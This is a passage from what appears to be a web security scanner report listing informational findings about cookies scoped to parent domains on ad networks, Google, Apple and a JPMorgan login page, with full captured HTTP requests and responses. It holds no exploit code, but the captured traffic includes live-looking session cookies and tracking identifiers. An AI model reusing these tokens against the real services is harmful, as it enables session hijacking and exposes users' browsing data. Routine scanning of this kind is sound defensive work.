Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2%0A1443%3B07%2F26%2F2011%3BNETM7; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 06-Jul-2012 21:30:51 GMT; Path=/
Set-Cookie: cwbh1=357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A1443%3B07%2F26%2F2011%3BNETM7%0A2996%3B08%2F11%2F2011%3BLOW21; Domain=.contextweb.com; Expires=Wed, 15-Jun-2016 21:30:51 GMT; Path=/
Content-Type: image/gif
Date: Tue, 12 Jul 2011 21:30:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.13. http://bstats.adbrite.com/click/bstats.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?kid=47018554&bapid=9470 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=Ci4KBjc2MjcwMRi9rereJiIeRTNGMzJCRDA1QThEREY0RDU2NDZENzk2NDAwODhCEAE; ut="1%3AVZJJsoMgFEX3wtgBoqJmN4oNoiiNhmjI3j%2BN9SuZnrrn3VsUb%2FBE4PEGc3%2BaTXUaPICu%2BNnZVDUiy2xqYSI02U8H1LjPARC64OnE%2FdOmO8xF8Q3z1SUXWjUB%2BltNuAVNAOpS0t3SsMTrl1bMrmo%2FZ0JvbcDcaYbXQwSDXIoAOhGBXI7cKWlrqggy%2BMI%2BsaK4Wh7M1K6JFLyNQJR8cwrRZR%2BVVNZB4b2K49aBuHFH0%2BPRIosuuPSJrLeXq1Btx7aYMgvfg3bEcVJ2l1urc5He46aD%2BqYca%2FavyDAujeMUIf6N9YvV7f0MtBolpMKnpqv4gdsvZCU1HPkCDO8CPaqTOFA%2BJxkLeCb9CyrKkc2tHhJdiC0c4muMaMxYqOMUeQAS0Dbr2qspfAPw%2BfwB"; vsd=0@1@4e1cb118@www.imiclk.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJkoQgFETvwtoFoKL2bRQHHFAGLdSi7t4MRkfX9kW%2BnxkEb%2FDC4OcN5u4ym2o1%2BAG65FdrkapFmlpkYSI03S8H1LDPAVC2kPEi3cuiHWYi%2Fw%2Bz1SUXVtYB%2Blt1uAVNAOpW0t066o6cNrW4LmD9qPns6vZrpuxRe8KdanjVR9DLJQ%2BgFRHI5cicghpTRpDCk%2FjEiuNyeUymskjTnDcRiIJvTqG66KKCZBUU3qk4cO3pM3Cw2OIbLl0iq%2B10Fapppy2mzML3oB1xnJTt7dbqTKBn3Hgw35QRPf0pMoxDcZyi1L%2BzPqeqeV6QlYOETPjUeOdfcPuGU8EMx76AwKdAD%2BqiDhSvUcYCnkr%2FgopxbDOr%2B0TnYguH%2BBojmkxTqOMMewAS0NTr2qkxfAXw%2BfwC"; path=/; domain=.adbrite.com; expires=Fri, 09-Jul-2021 20:40:09 GMT
Set-Cookie: vsd=0@3@4e1cb129@www.imiclk.com; path=/; domain=.adbrite.com; expires=Thu, 14-Jul-2011 20:40:09 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 12 Jul 2011 20:40:09 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.14. https://iblogin.jpmorgan.com/sso/action/federateLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iblogin.jpmorgan.com
Path:   /sso/action/federateLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/action/federateLogin?URI=https%3a%2f%2fmorcom.jpmorgan.com%2fIB%2fPostTrade%2fMORCOM&msg=+&securityLevel=300&ignorespnego=true&app=254651&ref=289733&cs=sYFeaoWWJKVj2jkatj0PGjSkwwc%3d HTTP/1.1
Host: iblogin.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pajpm1-temp="Tue Jul 12 12:29:11 EDT 2011"; JSESSIONID=CE57AB5A9A7C046C70A540F049D96361; __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:29:17 GMT
Server: Apache
Set-Cookie: pajpm5=sailSession; Domain=.jpmorgan.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 10225


                   <SCRIPT type="text/javascript">
<!--
   var cookieEnabled=(navigator.cookieEnabled)? true : false
   //if not IE4+ nor NS6+
   if (typeof navigator.cooki
...[SNIP]...

10.15. http://id.google.com/verify/EAAAAAA8ZuvsS7JEKK-IQjYnqI0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAAA8ZuvsS7JEKK-IQjYnqI0.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAAA8ZuvsS7JEKK-IQjYnqI0.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=adobe+psirt+web+server+security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=PrTm1sPBV8WcGKUpX24DX5FxWwEiYnRIQG1U8UDSmVNfNlXO4RsMbeCllROY8jurLY0nQ0ao8uAFMmNgXjVJP4Qp83yBr8GEcfw9vqYyVe1aEd9Jnty9TfIHuCmfrKOA

Response

HTTP/1.1 200 OK
Set-Cookie: NID=48=JND5NXvsSmFsBYvmrygMdzkGQswKJjIx-ckH2uK2OSHREX1f2o6ny0zTZ4mCnyT28X86cgIb7E2AtI99MfwKIztxvmcPwEEnk_nEBgeTgALZ0eooxulD-TiqDrXhRemv; expires=Wed, 11-Jan-2012 20:41:01 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:41:01 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.16. http://id.google.com/verify/EAAAAB5TmvHS4JtvGgryw3OQbj8.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAB5TmvHS4JtvGgryw3OQbj8.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAB5TmvHS4JtvGgryw3OQbj8.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=adobe+psirt
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=vgu7nJh0OOj_R3rfoTk_2iy3JQ0c3cKwGSV1uXyt=TzKGQ_4u__SbdsyK; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=PrTm1sPBV8WcGKUpX24DX5FxWwEiYnRIQG1U8UDSmVNfNlXO4RsMbeCllROY8jurLY0nQ0ao8uAFMmNgXjVJP4Qp83yBr8GEcfw9vqYyVe1aEd9Jnty9TfIHuCmfrKOA

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; expires=Wed, 11-Jan-2012 20:40:09 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 12 Jul 2011 20:40:09 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.17. http://id.google.com/verify/EAAAALupUYoUPVshUibYW8x6f5I.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAALupUYoUPVshUibYW8x6f5I.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAALupUYoUPVshUibYW8x6f5I.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://511.dot.ri.gov/hb/main.jsf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=JlF2Ve9cr9tNyLD4ZI8Hh8Zm9dmJGlgzHtojDX0u=XNCKdN_4bGk7uLcn; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=48=JND5NXvsSmFsBYvmrygMdzkGQswKJjIx-ckH2uK2OSHREX1f2o6ny0zTZ4mCnyT28X86cgIb7E2AtI99MfwKIztxvmcPwEEnk_nEBgeTgALZ0eooxulD-TiqDrXhRemv

Response

HTTP/1.1 200 OK
Set-Cookie: NID=48=G8GXu_mu_V4v5YxE2RqVYl3gQcYLRg30PTyN25cOw1cLTLBKpupiwM_D9n2e3-VyC48S_mOn73wfajzGDfFiwn12C9Ufm9LtLqm9u-FMzXndz4J5LJqChVjL88zMCKHU; expires=Thu, 12-Jan-2012 00:37:19 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 13 Jul 2011 00:37:19 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.18. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=9afcf94a-90e6-425e-a175-116aed2ea643&cacheBust=1310503167 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-C853333EC652166FAF7E3D0062149675759E1277B74C3E759400B711FCF64130-AD2295ECB4683944460A9D5F04A88CAF4EB4854AF4BF19B0D63B2248D4643BCA&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734329&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325; domain=.interclick.com; expires=Mon, 12-Jul-2021 20:39:29 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 12 Jul 2011 20:39:29 GMT

GIF89a.............!.......,...........D..;

10.19. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9MTI1MiZ0bD0xNTc2ODAw=1310503209 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; KRTBCOOKIE_16=226-uid:3460050161923843111; KRTBCOOKIE_153=1923-PFHfHjxXhEglBtlKPwGRHG1Q3RglDd5LPQdIK3DV; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.11265.29191.32345.48153.48669.48674.2083.1073.49076.48190.32326.45639.45640.45641.48203.48205.59481.32350.45677.30833.45683.1150.9855.13450.45708.45714.30915.30364.30878.49317.27165.47281.40626.29899.55492.199.34505.; KRTBCOOKIE_107=1471-uid:ea5c094a-3a81-4d54-b8e2-975f65fd39a9; KRTBCOOKIE_179=2451-uid:5475024508341082; KRTBCOOKIE_200=3683-d9b3a291e16202bc73f25332debaba4289e1f293b56107bf21f8003e8dbde946; PUBMDCID=2; KRTBCOOKIE_148=1699-uid:E3F32BD05A8DDF4D5646D79640088B; PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.1985_1309635446.461_1401136140.76_1310782572.2018_1311177776.1647_1310434072.806_1340039067.1298_1403835795.2114_1324986825.2138_1404051902

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.461_1401136140.76_1310782572.2018_1311177776.806_1340039067.1298_1403835795.2114_1324986825.2138_1404051902; domain=pubmatic.com; expires=Sun, 29-Jun-2014 14:25:02 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html


10.20. http://images.apple.com/global/nav/styles/navigation.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=555
Expires: Tue, 12 Jul 2011 18:08:21 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=...[SNIP]...; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.21. http://images.apple.com/global/scripts/apple_core.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/apple_core.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/apple_core.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "52da-4a36ce1818580"
If-Modified-Since: Mon, 16 May 2011 23:19:02 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 23:19:02 GMT
ETag: "52da-4a36ce1818580"
Cache-Control: max-age=308
Expires: Tue, 12 Jul 2011 18:04:14 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=...[SNIP]...; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.22. http://images.apple.com/global/scripts/browserdetect.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/browserdetect.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/browserdetect.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "25fd-4a4e72621e9c0"
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sat, 04 Jun 2011 18:36:31 GMT
ETag: "25fd-4a4e72621e9c0"
Cache-Control: max-age=321
Expires: Tue, 12 Jul 2011 18:04:27 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=...[SNIP]...; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.23. http://images.apple.com/global/scripts/lib/prototype.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/prototype.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/prototype.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "27df1-49fbc451c6740"
If-Modified-Since: Thu, 31 Mar 2011 00:21:09 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Mar 2011 00:21:09 GMT
ETag: "27df1-49fbc451c6740"
Cache-Control: max-age=365
Expires: Tue, 12 Jul 2011 18:05:11 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=...[SNIP]...; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


10.24. http://images.apple.com/global/scripts/lib/scriptaculous.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/scriptaculous.js

